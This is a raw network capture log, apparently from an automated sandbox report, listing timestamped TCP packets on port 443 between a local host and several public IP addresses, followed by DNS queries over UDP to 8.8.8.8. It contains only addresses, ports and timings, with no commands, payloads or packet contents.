May 4, 2021 12:35:14.486602068 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.486613989 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486639977 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486655951 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.486677885 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486704111 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486723900 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.486737967 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486778975 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.671654940 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.671694040 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.671717882 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.671741962 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.671765089 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.671787977 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.671819925 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.671829939 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.671863079 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.671890974 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.671916008 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.671925068 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.671948910 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.671971083 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.671998978 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672005892 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.672028065 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672051907 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672065973 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.672086000 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672110081 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672133923 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672143936 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.672163963 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672184944 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672205925 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672219038 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.672239065 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672261000 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672281981 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672293901 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.672317982 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672341108 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672362089 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672389030 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672410011 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672418118 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.672439098 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672466040 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672487974 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672498941 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.672518015 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672538042 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672557116 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672578096 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672602892 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672619104 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.672640085 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672662973 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672684908 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672705889 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.672719002 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672741890 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672761917 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672789097 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672808886 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.672825098 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672848940 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672871113 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672892094 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.672914028 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.672996044 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.857825994 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.857907057 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.857927084 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.857945919 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.857964039 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.857980967 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858001947 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858007908 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858030081 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858048916 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858063936 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858079910 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858103037 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858108997 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858131886 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858154058 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858174086 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858186960 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858202934 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858221054 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858241081 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858247995 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858267069 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858277082 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858294964 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858311892 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858325005 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858344078 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858367920 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858376980 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858402014 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858408928 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858431101 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858450890 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858463049 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858479023 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858495951 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858514071 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858522892 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858541012 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858557940 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858573914 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858589888 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858612061 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858622074 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858649015 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858654976 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858676910 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858696938 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858705044 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858722925 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858741045 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858762980 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858768940 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858787060 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858798027 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858813047 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858830929 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858844995 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858861923 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858884096 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858896971 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858916998 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858937025 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.858944893 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858963013 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858982086 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.858999014 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859251976 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.859255075 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.859272003 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859291077 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859308958 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859333038 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859349966 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859361887 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.859375954 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859394073 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859411001 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859425068 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.859442949 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859466076 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859488964 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859494925 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.859513044 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859529972 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859548092 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859561920 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.859574080 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859591961 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859610081 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859617949 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.859636068 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859653950 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859673023 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.859683037 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859703064 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859724998 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859734058 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.859752893 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859771013 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859787941 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859810114 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859816074 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.859833956 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859848022 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.859862089 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859880924 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859890938 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.859913111 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859935045 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859954119 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859965086 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.859982014 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.859998941 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860017061 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.860025883 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860044003 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860052109 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.860075951 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860084057 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.860102892 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860119104 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860136986 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860150099 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.860163927 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860182047 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860199928 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860212088 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.860228062 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860245943 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860254049 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.860270977 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860285044 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860297918 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860311985 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860327005 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860343933 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860363007 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860380888 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860399008 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860418081 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860450029 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860456944 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.860476971 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860495090 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860517025 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860522032 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.860539913 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860557079 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860582113 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860588074 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.860618114 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.860624075 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.860681057 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.869651079 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:15.045516014 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:15.045547009 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:15.045561075 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:15.045633078 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:15.057221889 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:15.057394981 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:15.242438078 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:15.242552042 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:15.242780924 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:15.242918015 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:22.691330910 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:22.691397905 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:22.735469103 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:22.735610962 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:32.931421995 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:32.931579113 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:32.975403070 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:32.975706100 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:42.519848108 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:42.519959927 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:42.639918089 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:42.640948057 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:42.833868980 CEST	443	49740	34.202.206.65	192.168.2.6
May 4, 2021 12:35:42.833899975 CEST	443	49740	34.202.206.65	192.168.2.6
May 4, 2021 12:35:42.833914995 CEST	443	49740	34.202.206.65	192.168.2.6
May 4, 2021 12:35:42.833969116 CEST	49740	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:42.834016085 CEST	49740	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:42.834321022 CEST	49740	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:42.970305920 CEST	443	49740	34.202.206.65	192.168.2.6
May 4, 2021 12:35:42.990185976 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:42.990223885 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:42.990252018 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:42.990365982 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:42.990401983 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:42.992556095 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:43.129168987 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:47.519525051 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:47.523327112 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:47.638866901 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:47.639344931 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:48.519759893 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:48.519788027 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:48.519958019 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:48.520229101 CEST	49738	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:48.569886923 CEST	443	49738	35.181.18.61	192.168.2.6
May 4, 2021 12:35:48.638469934 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:48.638498068 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:35:48.638653040 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:48.638931990 CEST	49739	443	192.168.2.6	35.181.18.61
May 4, 2021 12:35:48.690239906 CEST	443	49739	35.181.18.61	192.168.2.6
May 4, 2021 12:36:58.339729071 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:36:58.339864969 CEST	49737	443	192.168.2.6	143.204.98.126
May 4, 2021 12:36:58.339963913 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:36:58.340079069 CEST	49733	443	192.168.2.6	143.204.98.25
May 4, 2021 12:36:58.340189934 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:36:58.340271950 CEST	49731	443	192.168.2.6	13.224.193.90
May 4, 2021 12:36:58.383729935 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:36:58.383784056 CEST	443	49733	143.204.98.25	192.168.2.6
May 4, 2021 12:36:58.383894920 CEST	443	49737	143.204.98.126	192.168.2.6
May 4, 2021 12:36:58.384038925 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:36:58.384095907 CEST	49733	443	192.168.2.6	143.204.98.25
May 4, 2021 12:36:58.384123087 CEST	49737	443	192.168.2.6	143.204.98.126
May 4, 2021 12:36:58.384190083 CEST	443	49731	13.224.193.90	192.168.2.6
May 4, 2021 12:36:58.384216070 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:36:58.384377956 CEST	49731	443	192.168.2.6	13.224.193.90
May 4, 2021 12:36:58.384445906 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:36:58.387605906 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:36:58.387758017 CEST	49732	443	192.168.2.6	143.204.98.25

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 12:34:53.500410080 CEST	63791	53	192.168.2.6	8.8.8.8
May 4, 2021 12:34:53.562477112 CEST	53	63791	8.8.8.8	192.168.2.6
May 4, 2021 12:34:54.422542095 CEST	64267	53	192.168.2.6	8.8.8.8
May 4, 2021 12:34:54.471158981 CEST	53	64267	8.8.8.8	192.168.2.6
May 4, 2021 12:34:55.798602104 CEST	49448	53	192.168.2.6	8.8.8.8
May 4, 2021 12:34:55.847265959 CEST	53	49448	8.8.8.8	192.168.2.6
May 4, 2021 12:34:56.670723915 CEST	60342	53	192.168.2.6	8.8.8.8
May 4, 2021 12:34:56.732108116 CEST	53	60342	8.8.8.8	192.168.2.6
May 4, 2021 12:34:57.357371092 CEST	61346	53	192.168.2.6	8.8.8.8
May 4, 2021 12:34:57.417718887 CEST	53	61346	8.8.8.8	192.168.2.6
May 4, 2021 12:34:57.780878067 CEST	51774	53	192.168.2.6	8.8.8.8
May 4, 2021 12:34:57.829577923 CEST	53	51774	8.8.8.8	192.168.2.6
May 4, 2021 12:34:58.801419020 CEST	56023	53	192.168.2.6	8.8.8.8
May 4, 2021 12:34:58.851536989 CEST	53	56023	8.8.8.8	192.168.2.6
May 4, 2021 12:35:00.865335941 CEST	58384	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:00.916907072 CEST	53	58384	8.8.8.8	192.168.2.6
May 4, 2021 12:35:01.728233099 CEST	60261	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:01.779829979 CEST	53	60261	8.8.8.8	192.168.2.6
May 4, 2021 12:35:02.565555096 CEST	56061	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:02.615428925 CEST	53	56061	8.8.8.8	192.168.2.6
May 4, 2021 12:35:04.717751026 CEST	58336	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:04.766469002 CEST	53	58336	8.8.8.8	192.168.2.6
May 4, 2021 12:35:06.873187065 CEST	53781	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:06.922287941 CEST	53	53781	8.8.8.8	192.168.2.6
May 4, 2021 12:35:07.479854107 CEST	54064	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:07.517149925 CEST	52811	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:07.539890051 CEST	53	54064	8.8.8.8	192.168.2.6
May 4, 2021 12:35:07.578546047 CEST	53	52811	8.8.8.8	192.168.2.6
May 4, 2021 12:35:08.606442928 CEST	55299	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:08.666438103 CEST	53	55299	8.8.8.8	192.168.2.6
May 4, 2021 12:35:08.870486975 CEST	63745	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:08.919112921 CEST	53	63745	8.8.8.8	192.168.2.6
May 4, 2021 12:35:09.115089893 CEST	50055	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:09.173784018 CEST	53	50055	8.8.8.8	192.168.2.6
May 4, 2021 12:35:09.460712910 CEST	61374	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:09.519772053 CEST	53	61374	8.8.8.8	192.168.2.6
May 4, 2021 12:35:09.903906107 CEST	50339	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:09.962995052 CEST	53	50339	8.8.8.8	192.168.2.6
May 4, 2021 12:35:10.380845070 CEST	63307	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:10.443212986 CEST	53	63307	8.8.8.8	192.168.2.6
May 4, 2021 12:35:10.919177055 CEST	49694	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:10.938222885 CEST	54982	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:10.990144014 CEST	53	49694	8.8.8.8	192.168.2.6
May 4, 2021 12:35:10.999456882 CEST	53	54982	8.8.8.8	192.168.2.6
May 4, 2021 12:35:11.071753025 CEST	50010	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:11.134495020 CEST	53	50010	8.8.8.8	192.168.2.6
May 4, 2021 12:35:11.448997974 CEST	63718	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:11.607371092 CEST	62116	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:11.669842958 CEST	53	62116	8.8.8.8	192.168.2.6
May 4, 2021 12:35:11.702372074 CEST	53	63718	8.8.8.8	192.168.2.6
May 4, 2021 12:35:11.738496065 CEST	63816	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:11.787184954 CEST	53	63816	8.8.8.8	192.168.2.6
May 4, 2021 12:35:11.858181000 CEST	55014	53	192.168.2.6	8.8.8.8
